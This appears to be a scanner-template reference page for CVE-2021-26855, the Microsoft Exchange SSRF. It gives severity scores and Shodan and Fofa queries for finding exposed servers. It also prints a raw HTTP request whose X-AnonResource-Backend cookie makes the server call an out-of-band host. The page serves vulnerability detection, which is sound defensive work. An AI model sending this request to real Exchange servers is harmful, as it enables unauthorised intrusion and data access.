| Title | Microsoft Exchange Server SSRF Vulnerability |
|---|---|
| Author | madrobot |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system. |
| Remediation | Apply the appropriate security update. |
| CVSS Score | 9.1 |
| EPSS Score | 0.94351 |
| CVE ID | CVE-2021-26855 |
| CWE ID | CWE-918 |
| Shodan Query | vuln:CVE-2021-26855http.favicon.hash:1768726119http.title:"outlook"cpe:"cpe:2.3:a:microsoft:exchange_server" |
| Fofa Query | title="outlook"icon_hash=1768726119 |
| Tags | cve2021 cve ssrf rce exchange oast microsoft kev vkev vuln |
This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
GET /owa/auth/x.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Cookie: X-AnonResource=true; X-AnonResource-Backend=d5jnkd9le0o0va3i8jk0bxk3mzpc3mn74.oast.online/ecp/default.flt?~3;
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26855.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-26855.pcap
N/AN/A